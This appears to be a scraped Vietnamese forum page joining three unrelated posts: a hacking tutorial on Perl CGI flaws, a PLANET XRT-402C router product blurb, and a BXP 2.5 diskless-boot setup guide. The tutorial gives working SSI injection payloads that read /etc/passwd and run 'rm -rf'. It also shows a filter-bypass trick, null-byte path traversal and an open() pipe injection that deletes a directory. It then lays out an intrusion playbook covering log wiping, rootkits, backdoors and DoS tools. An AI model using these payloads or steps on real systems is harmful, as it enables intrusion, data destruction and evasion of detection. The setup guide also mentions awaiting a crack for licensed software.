Chắc các bạn cũng từng nghe qua về SSI vậy SSI thật ra là cái gì thưa các bạn tôi có thể nói rằng nó giống như #include file ->trong C/C++ hay hàm requery() và include() trong PHP nhưng đây là dùng cho SHTML(có nghĩa là file có đuôi là .shtml) vây cú pháp như sau:
<!--#thông tin -->
<!--#include file="/etc/passwd" -->
==>đưa thông tin của file /etc/passwd ra trình duyệt
<!--#exec cmd="rm -rf /home/you/www" -->
==>thi hành lệnh sau exec ở đây là 'rm -rf /home/you/www'
Đây là code CGIví dụ)
@pairs = split(/&/, $ENV{'QUERY_STRING'});
foreach $pair (@pairs)
{
($name, $value) = split(/=/, $pair);
$value =~ s/<!--(.|\n)*-->//g;
$FORM{$name} = $value;
}
Hãy nhìn $value =~ s/<!--(.|\n)*-->//g;nó đã lọc các SSI,và khi bạn dùng SSI thì nó không làm việc.Chúng ta hãy nhìn đoan code sau:
"<br> $username $email <br><br> $message <br>"
Vậy bạn có thể vào phần input trong trường user name ví dụ <!-- and email as #exec cmd="ls" --> thì nó sẽ thi hành lệnh ls.Lọc dữ liệu là phần quan trọng trong các úng dụng PERL Script,nhưng những hacker thì sẽ luôn tìm ra những khe hở để qua mặt hệ thống xem ví dụ sau:
$value =~ s/<!--(.|\n)*-->//g;
đoạn code trên lọc SSI với <!-- #anything --> nhưng hãy nhìn đoạn SSI sau:
<!-<!-- #nothing -->- #include file="/etc/passwd" -->
đoạn này thì không làm việc vì perl sẽ tìm <!-- đầu tiên và --> cuối cùng vậy ta hãy sữa đổi lại một chút như sau:
<!-<!-- -->- #include file="/etc/passwd" -<!-- -->->
Làm việc một cách rất ngon lành vì <!-- và --> không tìm thấy vậy ta đã lừa được hệ thống một cách ngoạn mục
Vậy bài học là gì:
Muốn tấn công hệ thống nào đó thì ta phải hiểu hệ thống đó có cấu trúc như thế nào làm việc ra sao,ở đây các ứng dụng CGI dùng perl script thì ta phải hiểu cách thức làm việc của perl thì mới có thể khai thác được.
Bây giờ bạn thấy hiểm hoạ to lớn từ SSI như thế nào rồi chứ hi vọng các bạn hãy quan tâm đến hệ thống của mình để tránh được các cuộc tấn công của hacker.
NULL Byte:
Vấn đề nằm ở \0 (00 hex) là NULL Byte,perl sẽ nhìn NULL Byte ở ký tụe NULL nhưng C thì không như vậy,chúng ta có thể vượt rào ngăn cản của hệ thống đó thông qua các hàm hệ thống như open(),exec()...Để dể hiểu hãy xem ví dụ sau:
#get input and put it into $file
$file = $ENV{'QUERY_STRING'};
#convert url encoding to ASCII (%00 will become the NULL Byte)
$file =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$filename = '/home/user/' . $file . '.txt';
open(FILE, "<$filename");
Đoạn code này làm gì? $file sẽ lấy /home/user/ đặt trước và .txt đặt sau nó.Khi $file=a cón nghĩa là nó sẽ mở file a.txt,nhưng khi bạn đánh trên trình duyệt với URL sau ví dụ:script.cgi%00 thì perl sẽ gởi /home/user/script.cgi\0.txt đến C và nó sẽ nhìn với /home/user/script.cgi là NULL Byte vậy khai thác như thé nào hãy làm như sau:Chèn một kí tự NULL byte vào phía sau câu truy vấn vd:../../../../etc/passwd\0 vậy là ta có thể đọc được file /etc/passwd,với những code upload thì ta cũng có thể up những file không cho phếp với những mẹo bất kỳ nào mà bạn nghĩ ra để lừa hệ thống
Vấn đề với hàm open():
Hàm open() rất hay được sữ dụng nhưng nó cũng có những mối nguy hiểm đến hệ thống của ban,để cho vấn đè được rỏ ràng hơn hãy ghé thăm ví dụ sau:
use CGI;
$input=CGI->new();
$file = $input->param('file');
open(FILE, $file) or &diehtml("cannot open that file");
Hãy khai thác thữ lổi này:
<A href="http://b0iler.eyeonsecurity.net/script.cgi?file=rm" target=_blank><FONT color=#abb2d5>http://b0iler.eyeonsecurity.net/script.cgi?file=rm -rf ./|
thư mục hiện hành sẽ bị xoá,vậy là bạn có thể thấy tính nguy hiểm của nó như thế nào rồi
Tóm lại:
Tôi đã trình bày sơ qua một số lổi của các ứng dụng CGI mà sữ dụng PERL Script mong rằng với những kiến thức nhỏ này bạn có thể hiểu thêm về tầm quan trọng của việc bảo mật hệ thống,hi vọng từ bài viết này có thể giúp cho các bạn biết một số lổi thường gặp của ứng CGI mà khai thác và fix một cách hiệu quả.Nếu có gì thiếu sót mong anh em chỉ giáo.
Các bước của hacker khi muốn đột nhập vào một hệ thống máy chủ :
<Bước 1> FootPrinting : Các mục tiêu của bước này chủ yếu là những thông tin ban đầu về server . Công nghệ bạn cần sử dụng là : Open source search ( nguồn máy chủ tìm kiếm ) Whois , Web interface to whois , Arin Whois , DNS zone transfer ( bộ phận này chủ yếu là kiểm tra về người chủ server , DNS .. cấu trúc server chưa thể hiện rõ ở đây ) 1 số công cụ : UseNet , search engines ( công cụ tìm kiếm ) , Edgar Any Unix client , http://www.networksolutions.com/whois , http://www.arin.net/whois , dig , nslookup Is -d , Sam spade
<Bước 2> Scanning : Phần lớn các server chịu bung thông tin quan trọng trong bước này , hãy cố gắng tận dụng bước này triệt để để biết các port trên server , nghe đường dữ liệu . Công nghệ bạn cần sử dụng là : Ping Sweep , TCP/UDP port Scan , Os Detection . Các công cụ : fping , icmpenum Ws_ping ProPack , nmap , SuperScan , fscan nmap , queso , siphon .
<Bước 3> Enumeration : Đến bước này , các attacker bắt đầu kiểm soát server sơ bộ , xác định các account trên server , mức độ bảo vệ ... Công nghệ bạn cần sử dụng là : List user accounts , List file share , Identify applications . Các tool phụ trợ : null sessions , DumpACL , sid2user , OnSite Admin showmount , NAT , Legion banner grabbing với telnet , netcat , rpcinfo .
<Bước 4> Gaining access : Aha , đã có đủ dữ liệu để kết hợp tất cả chúng lại . Chúng ta bắt đầu đến gần mục tiêu . Hãy nắm chắc cơ hội . 1 account có thể bị Crack . Công nghệ : Password eavesdropping , File Share brute forcing , Password file grab , buffer overflows . Các tool : tcpdump , L0phtcrack readsmb , NAT , legion , tftp , pwdump2 ( NT ) ttdb , bind , IIS , .HTR/ISM.DLL
<Bước 5> Escalating privilege : Nếu 1 account không may mắn nào ở một cấp độ nào đó bị crack ở bước trên , chúng ta sẽ có cái tận dụng để điều khiển Server . Công nghệ : Password cracking , BUG ,Exploits . Tools : john , L0phtcrack , Ic_messages , getadmin , sechole .
<Bước 6> Pilfering : Thông tin lấy từ bước trên đủ để ta định vị server và điều khiển server . Nếu bước này không thành công , hãy đến bước <9> . Công nghệ : Evaluate trusts , Search for cleartext passwords . Tool : rhost , LSA Secrets user data , configuration files , Registry .
<Bước 7> Covering Tracks : Hệ thộng luôn ghi nhận những hành động của bạn . Nếu bây giờ mà kết thúc , chắc bạn bị tóm ngay . Đây là bước cực kì quan trọng . XÓA LOG . Công nghệ : Clear logs , hide tools . Tools : Zap , Event log GUI , rootkits , file streaming .
<Bước 8> Creating Backdoors : Còn phải hỏi , bạn phải để lại 1 cái cổng sau , lần sau có vào thì dễ hơn chứ . Nếu không thành công , quay lại bước <4> xem lại các quyền của user bạn sử dụng . Công nghệ : Creat rogue user accounts , schedule batch jobs , infect startup files , plant remote control services , install monitoring mechanisms , replace apps with Trojan . Tools : members of wheel , administrators cron, At rc , Startup folder , registry keys , netcat , remote.exe , VNC , BO2K , keystroke loggers, add acct to secadmin mail aliases login , fpnwclnt.dll
<Bước 9> Denial of Servies : 1 attacker không thành công với những gì anh ta đã làm ... họ sẽ tận dụng những exploits code để làm cho server ngừng hoạt động luôn , gọi đó là : tấn công từ chối dịch vụ . Công nghệ : SYN flood , ICMP techniques , Identical src/dst SYN requests , Overlapping fragment/offset bugs , Out of bounds TCP options ( OOB ) DDoS . Tools phụ trợ : synk4 , ping of death , smurf land , latierra , teardrop , bonk , newtear , supernuke.exe , trinoo/TFN/stacheldraht
Thế đó , những bước hacker hay attacker làm với server khi họ muốn attack . Không đơn giản chút nào nhỉ ?
Những tool trên , bạn có thể search ở các máy tìm kiếm như http://www.google.com/ , http://www.av.com/ ... với từ khoá là tên tôi đã cho .
|
|
|
|
Tác giả: (someone)
Planet Internet Broadband Router XRT402C
PLANET Technology Corp. cung cấp một giải pháp hoàn toàn bằng phần cứng đáng tin cậy và hiệu quả, thiết bị XRT-402C với khả năng cung cấp dịch vụ kết nối Internet tốc độ cao, chi phí thấp và tính năng bảo mật an toàn cho toàn bộ mạng LAN.
Hơn nữa với khả năng ánh xạ địa chỉ IP động ra một tên miền duy nhất khi kết hợp với Modem ADSL, XRT-402C có thể sử dụng được các dich vụ Webserver, MailServer, FTPServer, VoIP, InternetCamera ngay tại máy chủ của công ty mà không cần thuê chỗ đặt Webserver hay Mailonline trên ISP. Ngoài ra nó có thể gộp 2 kết nối ADSL tới nó để san tải cho nhau và dùng làm đường backup.
Các bạn chú ý nhé. Nếu các bạn sử dụng 2 modem ADSL thì sẽ có 2 địa chỉ IP Gateway Internet, và khi bạn dùng thiết bị XRT này nó sẽ chỉ tạo ra duy nhất 1 IP Gateway là IP của XRT. Phù hợp cho 1 số bạn muốn dùng các phần mềm quản lý bắt buộc chỉ 1 IP Gateway.
Đặc trưng truy cập Internet:
Chia sẻ truy cập Internet:Tất cả người dùng trong LAN có thể truy cập Internet thông qua XRT-402C, chỉ sử dụng một địa chỉ IP mở rộng (địa chỉ WAN do ISP cung cấp).
Hỗ trợ dịch vụ DSL: Có 2 cổng 10/100 BaseT cho kết nối kép DSL hoặc Cable Modem để chia sẻ tài nguyên Internet đến người dùng với băng thông tối ưu nhất. Tất cả các DSL thông dụng và Cable Modem đều được hỗ trợ.
Hỗ trợ địa chỉ IP tĩnh và động: Trong kết nối Internet (cổng WAN), hỗ trợ cả địa chỉ IP động (địa chỉ IP được cho phép trong kết nối) và địa chỉ IP tĩnh.
Hỗ trợ PPPoE và PPTP: Việc kết nối Internet thông qua các giao thức PPPoE, PPTP, PPPoA, DHCP cho phép người sử dụng kết nối vơi ISP thông qua các giao thức trên.
Chức năng Internet nâng cao:
Ngoài các tính năng cơ bản như chia sẻ Internet cho mạng LAN như modem ADSL thông dụng, thiết bị Firewall của Planet còn có những ưu điểm sau:
Virtual Server: Cho phép chia sẻ tài nguyên cục bộ của mạng như các máy chủ E-mail, FTP hay WEB cho người sử dụng trên Internet theo nhiều cách khác nhau.
DMZ: Cho phép các máy chủ đóng vai trò như một nút Internet độc lập, giao tiếp hai chiều với Internet và hỗ trợ các ứng dụng như Game trực tuyến, VoIP, Video Conferencing đồng thời vẫn đảm bảo tính năng bảo mật và an toàn cho người sử dụng mạng LAN.
Firewall: Hỗ trợ các chức năng như Access Control, URL Blooking, Scheduled giúp người quản trị mạng có thể định nghĩa các chính sách ngăn cấm người sử dụng Internet trong mạng LAN.
Chức năng Inspection FireWall giúp giám sát tất cả các dữ liệu từ Internet đến mạng LAN với khả năng ngăn ngừa sự phá hoại của các hacker và gửi Email cảnh báo đến người quản trị về các cuộc tấn công của hacker như: Ping of Death, IP with zero length, TCP null scan, UDP port loopback, TCP SYN flooding, IP Spoofing, Smurf Attack.
Load-balance, Redundant-link và QoS : Hỗ trợ 2 cổng WAN cho những ứng dụng yêu cầu đỏi hỏi băng thông ổn định. Người quản trị mạng có thể triển khai thêm kết nối ADSL đến những cổng này để đảm bảo tải và khả năng Backup khi một đường bị lỗi. Hơn nữa người quản trị mạng thông qua QoS cũng có khả năng thiết lập những chính sách khác nhau cho các ứng dụng cần truy cập vào Internet đến các cổng nhằm đảm bảo băng thông.
Đặc trưng truy cập LAN:
Chức năng NAT: Việc phân giải địa chỉ là một trong những phương pháp mà người dùng có thể sử dụng để truy nhập một địa chỉ IP (tĩnh hoặc động) của ISP để truy nhập Internet. Với XRT-402C cho phép 253 người sử dụng Internet cùng một lúc.
Các cổng Ethernet: Có 4 cổng (Ethernet RJ-45) được sử dụng để kết nối với PC hoặc được cắm vào Switch để mở rộng số lượng PC kết nối.
Hỗ trợ DHCP server: tính năng DHCP server cho phép XRT-402C tự động cung cấp địa chỉ IP cho các PC trong mạng LAN.
Cấu hình và quản lý:
Dễ dàng cài đặt: Sử dụng trình duyệt Web tại bất cứ đâu để cấu hình, với hệ thống tài khoản đăng nhập để ngăn ngừa những người sử dụng chưa được chứng thực có thể thay đổi cấu hình.
Quản lý từ xa: XRT-402C có thể được quản lý từ bất kỳ PC nào trong mạng LAN. Và nếu tồn tại các kết nối Internet thì nó có thể được cấu hình thông qua Internet.
Bảng thông số:
Model
XRT-402C
WAN 2
LAN 4
Dạng kết nối
PPPoE Y
PPTP Y
DHCP Y
Fixed IP Y
Quản lý
ConfigWizard Y
Admin Interface Web
DHCP Server Y
Tính năng đặc biệt
----DMZ Y
----Virtual Server Y
----Firewall
----NAT Y
----SPI Y
----DoS Protection Y
----PPTP/L2TP/IPSEC Pass-throught Y
VPN feature
VPN Tunneling
---
3DES Performance
---
Các dạng thiết bị XRT khác:
XRT-401C: Internet Broadband Router (TCP/IP, with 4 LAN port, 1 WAN port).
- XRT-402C: Internet Broadband Router (TCP/IP, with 4 LAN port, 2 WAN port).
- XRT-204C: Internet Broadband Router (TCP/IP, with 2 LAN port, 4 WAN port).
Hãy liên hệ với chúng tôi để được giá tốt nhất
Đây chính là thiết bị mà nhiều bạn đang có nhu cầu sử dụng để cân bằng tải và chọn đường Backup khi các bạn đăng ký 2 đường ADSL (VNN và Vietel chẳng hạn)
Tác giả: (someone)
|
|
|
|
Tác giả: (someone)
I.CHUẨN BỊ TRƯỚC KHI CÀI ĐẶT
Máy chủ:
- Hệ điều hành cho máy chủ có thể là: Windows XP, Windows 2000 Professional, Windows 2000 Server, or Windows 2000 Advanced server. Tốt nhất nên chọn Windows 2000 Advanced server và cài bản service pack mới nhất (hiện tại là service pack 4)
- Đĩa cứng : Tuỳ theo cách cài đặt là dùng chung ổ cứng (Share Image) hoặc riêng mỗi ổ cứng cho client (Private Image) để chọn cho phù hợp.
VD: nếu cài theo kiểu Share Image cho tất cả các client bạn chỉ cần ổ cứng khoảng 15GB cũng đủ, Trong trường hợp cài Private Image, VD mỗi image client là 3.5GB hệ thống mạng của bạn có 20 client thì phần ổ cứng của máy chủ để chứa các image của tất cả 20 client là 3.5*20 =70GB, vì vậy bạn có thể dùng ổ 80GB cho hệ thống mạng. Ổ cứng phải chọn loại 7200rpm (hoặc tốt hơn nữa là SCSI) .
Máy con (Client)
Máy con có thể chạy bootrom với Windows2000 Professional hoặc WindowsXP Professional, tuy nhiên trong bài này chỉ đề cập đến WindowsXP Proessional mà thôi.
- Mỗi máy con phải có 1 card mạng với bootrom PXE (version v.99j hoặc cao hơn). Card mạng phải thuộc 1 trong 3 loại sau: 3com905C, Intel Pro/100, RTL8139.
Trong bài hướng dẫn này tôi dựa trên theo mô hình như sau:
1. Máy chủ: cài Windows2000 Server (chưa cài service pack), cấu hình Domain, cài sẵn dịch vụ DHCP, ổ cứng được định dạng theo NTFS. Giao thức chính làTCP/IP với địa chỉ được khai báo cho máy chủ là 192.168.0.1. Tạo sẵn các account cho máy con từ USER01, USER02, USER3....
2. Máy client: chuẩn bị sẵn một máy client có ổ cứng (gọi là ổ cứng tham khảo) đã cài sẵn Windows XP và các ứng dụng cần thiết như Microsoft Office, font...., Tạo một account là USER01 với quyền admin và khi khởi động tự động log on bằng user này. Trong phần Computer name khai báo tên là USER01, còn ở phần khai báo về mạng ta khai báo Workgroup (mặc dù khai báo domain hay workgroup đều được nhưng nên khai báo workgroup để quá trình log on vào máy chủ sẽ nhanh hơn).
Máy con phải có giao thức TCP/IP (mặc nhiên khi cài card mạng đã có). Phải bảo đảm máy con thông mạng với máy chủ trước khi tiến hành cài BXP.
II.Cài đặt BXP ở máy chủ:
Trước khi cài BXP 2.5, nếu trong máy chủ của bạn có một phiên bản nào trước của BXP 2.5 như 3Com VLD, BootNic, BXP2.0 thì bạn phải remove khỏi hệ thống cũng như xóa các thư mục liên quan đến chúng rồi mới tiến hành cài BXP2.5.
1. Double-click vào file BXP 2.5, đây là file nén tự bung nên chương trình sẽ thực hiện quá trình giải nén sau đó mới tiến hành cài đặt.
2. Hộp thoại Setup type sẽ xuất hiện như sau
3. Chọn Full Server và click Next
4. Tiếp theo hộp thoại Select Components sẽ xuất hiện:
Bạn tắt dấu check ở phần Tellurian DHCP Server
(Phần này chỉ chọn khi máy chủ không cài dịch vụ DHCP, VD như trường hợp máy chủ cài hệ điều hành Windows XP, Windows 2000 profession)
5. Tiếp tục cho đến hộp thoại đăng ký xuất hiện như sau:
(Do tôi soạn thảo bài này khi chưa có crack nên phần đăng ký này tôi không trình bày chi tiết được, chỉ dừng ở đây mà thôi)
Nếu bạn muốn dùng thử thì điền đầy đủ các thông tin ở các mục (không cần chính xác), chỉ bỏ trống 2 mục là License key và License request và click Obtain Trial. Cách này cho phép bạn dùng thử 1 tháng với một hệ thống mạng chỏ có 5 client mà thôi. Tuy nhiên lúc náy máy bạn phải kết nối internet để nhận thông tin từ WWW.VCI.COM thì việc dùng thử này mới được cho phép.
6. Nếu máy chủ chạy Windows XP sẽ có một thêm một hộp thoại Found New Hardware xuất hiện để cài đặt driver cho ổ cứng ảo của BXP
Bạn chỉ việc click Next, tiếp theo là hộp thoại xác nhận việc cài đặt này, bạn chỉ việc click Continue anyway là hoàn tất quá trình cài đặt BXP ở máy chủ.
1. Cài đặt các thành phần của BXP Server
Gồm có các dịch vụ (Service) sau
• 3Com PXE Service (hoặc 3Com BOOTP Service)
• BXP TFTP Service
• BXP Login Service
• BXP IO Service
Chọn loại PXE hoặc Boot TP
Các loại card mạng có hỗ trợ bootrom PXE có hai loại như sau:
- Loại hỗ trợ DHCP: đây là loại thông dụng, trong quá trình boot, DHCP ở máy chủ sẽ dựa theo địa chỉ MAC để cung cấp địa chỉ IP cho máy con
- Loại hỗ trợ BootTP (ít gặp), với loại này ta phải cấu hình trước để có địa chỉ IP đăng ký trước tương ứng với địa chỉ MAC của nó. Do loại này ít có trên thị trường nên trong bài này tôi không trình bày các phần liên quan đến Boot TP, các bạn sau này có nhu cầu sử dụng nó có thể tham khảo tài liệu đi kèm với BXP
1-1. Cấu hình cho PXE Service
1. Từ Start\Setting\Control Panel Double click vào biểu tượng 3COM PXE . Nếu có một thông báo xuất hiện rằng dịch vụ PXE chưa khởi động, bạn click Yes để bỏ qua và tiếp tục. Hộp thoại sau sẽ xuất hiện
2. Từ tab Options , kiểm tra để bảo đảm đúng đường dẫn ở mục Datafile là C:\Program Files\Venturcom\BXP\TFTPBOOT > Nếu sai, bạn có thể click Browse để chọn lại.
3. Nếu dịch vụ DHCP đang hoạt động ở máy chủ thì mặc nhiên mục Proxy DHCP sẽ bị mờ (Chỉ chọn mục này khi dịch vụ DHCP chạy ở một máy chủ khác)
4. Click vào tab Network Adapters , hộp thoại sau sẽ xuất hiện
Kiểm tra dấu check phải được chọn ở địa chỉ IP của card mạng dùng chạy dịch vụ này là 192.168.0.1
5. Click OK để thoát khỏi hộp thoại này.
1-2. Cấu hình cho Venturcom TFTP Service
1.Từ Control Panel, double click vào biểu tượng Venturcom TFTP Service.
Hộp thoại sẽ hiện ra như sau:
2. Kiểm tra xem đường dẫn ở mục Transmit (GET) directory (chỉ đến file Vldrmi13.bin) đúng là C:\Program Files\Venturcom\BXP\TFTPBOOT
3. Kiểm tra mục Allow Transmit được chọn
4. Click tab TFTP Network và click chọn vào phần địa chỉ IP của card mạng để chạy dịch vụ này : 192.168.0.1
Chú ý: PXE and TFTP Servers phải được gắn cùng một card mạng
5. Kiểm tra Port number phải là 69
6. Click tab TFTP Logging .
Do trong quá trình hoạt động, BXP TFTP Server sẽ log các thông báo của mình đến System Event log của Windows 2000 nên ở đây bạn có thể chọn mức độ để tạo ra các thông tin đó, Maximum là Log All Events.
7.Click OK để save và thoát khỏi hộp thoại.
1-3. Cấu hình BXP IO Service
1.Từ ổ C hoặc ổ D của máy chủ (phải được định dạng bằng NTFS), tạo một thư mục để lưu trữ các file image của các Client. VD là D:\VDISKS
2. Từ Start\Programs\Venturcom BXP chọn BXP IO Service Preferences. Hộp thoại sau sẽ xuất hiện
3. Click Browse, chọn đúng đến thư mục D:\VDISKS đã tạo ở bước1
4. Ở phần IP Settings, chọn card mạng được dùng cho dịch vụ này bằng cách click chọn vào địa chỉ IP tương ứng, ở đây là 192.168.0.1
5. Ở mục Port phải đúng là 6911
6. Click OK để save lại và thoát khỏi hộp thoại.
1-4. Cấu hình BXP Login Service
1. Từ Start\Programs\Venturcom BXP chọn BXP Login Service Preferences. Hộp thoại sau sẽ xuất hiện
2. Kiểm tra đường dẫn ở mục Database chỉ đến file VLD.MDB là C:\Program Files\Venturcom\BXP\VLD.MDB.
3. Click chọn vào mục Add new clients to database để sau này có thể cài đặt các client một cách tự động
4. Chọn loại card mạng dùng cho dịch vụ này bằng cách click check vào địa chỉ tương ứng, ở đây là 192.168.0.1
5. Click OK.
2. Khởi động các dịch vụ của BXP đã được cấu hình
1. Từ Control Panel, double click vào biểu tượng Administrative Tools, tiếp theo double click tiếp vào biểu tượng Services, (hoặc có thể chọn Star\Program\Administrator Tools\Services) hộp thoại sau sẽ xuất hiện:
Có 7 dịch vụ liên quan đến BXP, ở đây chúng ta chỉ cấu hình 6 dịch vụ như sau (bỏ qua 3Com BOOTTP.)
1. 3Com PXE
2. BXP TFTP Service
3. BXP Adaptive Boot Server
4. BXP IO Service
5. BXP Login Service
6. BXP Write Cache I/O Server
Để cấu hình cho dịch vụ 3Com PXE bạn click chuột phải rồi chọn Properties (hoặc double click chuột trái cũng được), sau đó từ hộp thoại hiện ra click nút Start để khởi động dịch vụ, tiếp đó từ mục Startup type thay đổi từ Manual sang Automatic. Sau đó chọn OK để save lại.
Tiếp theo bạn lần lượt làm tương tự cho các dịch vụ còn lại theo thứ tự như 6 dịch vụ đã liệt kê trên.
Sau khi đã cấu hình xong cho 6 dịch vụ trên, bạn có thể kiểm tra lại bằng cách nhìn vào cột Status và Startup Type trên bảng Services để xem 6 dịch vụ đó đã được khởi động và đã được cấu hình là Automatic hay chưa.
(Chú ý: sau khi đã khởi động dịch vụ BXP Write Cache I/O Server thì trong thư mục chứa các file Image (D:\VDISKS) sẽ tạo ra một thư mục con là WriteCache, chi tiết về thư mục này tôi sẽ trình bày ở các phương pháp cache ..)
3. Cấu hình cho BXP Administrator
- Từ Start\Programs\ Venturcom BXP, chọn BXP Administrator, màn hình BXP Administrator sẽ xuất hiện như sau:
Trong phần BXP Administrator chúng ta sẽ cấu hình các thành phần sau:
- Cấu hình bootstrap file
- Cấu hình IO Server
- Tao ổ cứng ảo (image) cho client
- Format ổ cứng ảo
- Đăng ký client vào cơ sở dữ liệu của BXP (tạo user)
- Đăng ký ổ cứng ảo cho client
*Với màn hình của BXP Administrator chúng ta có 3 cách nhìn trong quá trình cài đặt như, để thay đổi cách nhìn chúng ta có thể chọn lại dấu check từ menu View:
1. Client -> Disk: Liệt kê chỉ các client có trong sở dữ liệu của BXP (các máy con đã được cài đặt). Khi bạn click vào một client nào đó, nó sẽ liệt kê các ổ cứng ảo (image) dành cho client đó
2. Server -> Disk: Cho phép bạn thấy các ổ cứng ảo được tạo trên máy chủ
3. Server -> Client -> Disk: Cho phép bạn nhìn tất cả các client, image và Server (IO server) đã được cài đặt
3-1. Cấu hình cho Bootstrap
Bootstrap file là file chứa thông tin khởi động mà bootrom sẽ tìm đến để khởi động quá trình đầu cho các client. Với BXP thì file đó là VLDRMIL13.BIN. Để cấu hình cho Bootstrap ta làm như sau:
1.Trong màn hình BXP Administrator, chọn menu Tools, chọn tiếp Configure Bootstrap.
2. Ở phần Path khai báo đường dẫn đến file VLDRMI13.BIN. Mặc nhiên đường dẫn này là
C:\Program Files\Venturcom\BXP\TftpBoot\ VLDRMI13.BIN
3. Chọn dấu check ở mục Use BOOTP\DHCP Resolved nếu chưa có
4. Chọn dấu check ơ mục Use Database Values nếu chưa có
5. Chọn Verbose Mode để hiển thị thông tin chi tiết quá trình boot khi khởi động của máy client (VD: IP của máy chủ, máy client, DHCP...). Khi bạn đã hoàn tất quá trình cài đặt cho hệ thống mạng thì có thể tắt mục này để quá trình khởi động ở client nhanh hơn.
6. Click OK để save và thoát khỏi hộp thoại.
3-2. Cấu hình cho IO Server
1. Ở màn hình của BXP Administrator, từ menu File chọn New\Server. Hộp thoại New IO Server xuất hiện như sau
2. Ở phần Name bạn gõ vào tên của máy chủ, trong VD này là SERVER. Nếu gõ đúng tên thì khi bạn click tiếp vào nút Resolve ở mục IP Address sẽ tự hiển thị lên địa chỉ IP của máy chủ là 192.168.0.1
4. Phần Port mặc định là 6911
5. Phần Description bạn có thể gõ một thông tin bất kỳ liên quan đến IO Server, hoặc bạn để trống cũng được.
Lúc này trong màn hình của BXP Administrator sẽ có thêm một biểu tượng server nữa, đó là IO Server mới được tạo.
3-3. Tạo ổ cứng ảo - Virtual disk
1. Vẫn từ màn hình của BXP Administrator, từ menu View bạn chọn dấu check ở hàng Server ->Disk. Lúc này trên màn hình của BXP Administrator bạn chỉ thấy một server đó là I/O server mới tạo ở bước trên, đồng thời biểu tượng New Disk trên thanh công cụ sẽ chuyển sang màu xanh lục.
2.Từ menu File chọn New\Disk, Hộp thoại Add Virtual Disk sẽ xuất hiện
Mặc nhiên ở mục Path chỉ đến đường dẫn D:\VDISKS như ta đã tạo ở trên, nếu sai click Browse để tạo lại.
3. Click vào mục New disk (mặc nhiên đã được chọn)
4. Ở mục Virtual disk size in MB bạn gõ vào dung lượng của ổ cứng ảo muốn tạo, maximum là 8024MB (8GB). nếu partition chứa thư mục VDISKS của máy chủ bạn là FAT32 thì tối đa của ổ cứng ảo được tạo là 4GB mà thôi.
5. Ở mục Disk name bạn gõ vào tên file image của ổ cứng ảo muốn tạo, VD là VIRTUALXP (không cần có phần mở rộng)
6. Ở mục Description bạn gõ vào một chữ bất kỳ để mô tả file image này, hoặc không cần cũng được.
-Chú ý: một khi ổ cứng ảo đã được tạo thì không thể thay đổi lại dung lượng của nó, muốn thay đổi chỉ có cách là tạo mới ổ khác mà thôi. Vì vậy trước khi tạo image bạn phải tính chính xác dung lượng cần thiết để khỏi phải thay đổi lại sau này.
7. Click OK để hoàn tất. Quá trình tạo ổ cứng ảo có thể mất vài phút (chậm hơn rất nhiều so với khi cài 3Com VLD và BootNic).
BXP cho phép một client có đến 4 ổ cứng ảo, nếu bạn tạo cho 1 client 4 ổ cứng thì khi khởi động trong Windows của Client sẽ có 4 ký tự ổ đ*a là C,D,E,F.
3-4 Format ổ cứng ảo đã được tạo ở bước trên
Với phần mềm 3Com VLD, việc format ổ cứng này được tạo ở máy client và dùng lệnh format của Dos để thực hiện. Còn từ Bootnic đến BXP 2.0 và BXP 2.5, do có hỗ trợ định dạng ổ cứng của client là NTFS nên việc format này được thực hiện ở máy chủ.
Để máy chủ nhận diện được ổ cứng này để format, BXP cung cấp một tiện ích trong phần BXP Administrator cho phép map file image của client thành một ổ đ*a trên máy chủ .
Với cách cài Private Image chúng ta phải tiến hành thao tác này lần lượt cho từng ở cứng ảo của tất cả các client trong mạng!.
Cách thực hiện như sau
1. Từ màn hình BXP Administrator, click vào menu View, sau đó click chọn vào Server->Disk.
2. Click vào biểu tượng của server (IO Server), nó sẽ hiển thị các ổ cứng ảo có sẵn (trong phần trước cúng ta đã tạo được một ổ cứng ảo có tên là VIRTUALXP), tiếp theo click chọn vào ổ cứng ảo VIRTUALXP và từ menu Tools chọn Map Virtual Disk. Lúc này bạn sẽ thấy ổ cứng ảo VIRTUALXP sẽ chuyển sang màu xanh lục
Chú ý: Chỉ map ổ cứng ảo khi không có client nào đang sử dụng nó!
3. Sau khi map xong, trong My Computer hoặc Windows Explore của máy chủ sẽ xuất hiện thêm một ổ cứng như hình sau:
4. Click chuột phải vào ổ đ*a này và chọn format như bảng sau:
* Sau khi format xong ta tiến hành Un-map để trả lại trạng thái gốc cho nó
- Từ màn hình của BXP Administrator, click vào menu View vào chọn Server->Disk.
- Chọn vào ổ cứng ảo ta vừa tiến hành map và format, Từ menu Tools ta chọn lại Map Virtual Disk một lần nữa, biểu tượng ổ cứng ảo VIRTUALXP sẽ trở lại màu bình thường và đồng thời trong My Computer của máy chủ biểu tượng ổ cứng được map ở bước trên sẽ biến mất.
3-5. Tạo các Client (còn gọi là tạo user)
Để tạo client ta có 2 cách: Tự động và thủ công:
A. Tạo Client bằng phuơng pháp tự động
Với cách này phải bảo đảm là trong phần BXP Login Service bạn có chọn option Add new clients to database( xem lại phần 1-4)
1. Lần lượt khởi động các máy con (máy con phải được chọn từ Cmos Setup hoặc từ cấu hình của BootRom PXE là boot từ rom trước!). Lúc đó với máy đầu tiên sẽ có một màn hình khởi động như sau:
1. Ở mục Client Name bạn gõ tên của client1, chẳng hạn là USER01, ở mục Description gõ vào thông tin để mô tả user01 này, hoặc bạn để trống rồi nhấn Enter. Lúc này ở cơ sở dữ liệu của BXP đã tự động tạo ra một USER01
*Bạn có thể kiểm tra lại USER01 này như sau:
- Từ màn hình của BXP Administrator, Chọn menu View và chọn tiếp Client->Disk, click tiếp vào biểu tượng của Clients bạn sẽ thấy xuất hiện biểu tượng USER01. Muốn xem chi tiết hơn bạn click chuột phải vào USER01 và chọn Properties, sẽ thấy xuất hiện bảng như sau
2. Tiếp theo bạn làm lần lượt với các máy còn lại là USER02, USER03...
B. Tạo Client bằng phương pháp thủ công
1. Với cách này, trước tiên bạn khởi động tất cả các máy con trong mạng, rồi từ màn hình khởi động giống như trên bạn ghi lại tất các các địa chỉ MAC (Local Mac)
2. Từ màn hình BXP Administrator, Chọn menu File, tiếp theo chọn New\Client, hộp thoại New client sẽ xuất hiện như sau:
3. Ở mục Name, bạn gõ vào USER01
4. Ở mục MAC, bạn nhập vào địa chỉ đã ghi lại của USER01 ở bước 1
5. Ở mục Description bạn có thể gõ vào một thông tin bất kỳ về USER01, hoặc là để trống cũng được.
6. Click OK để hoàn tất
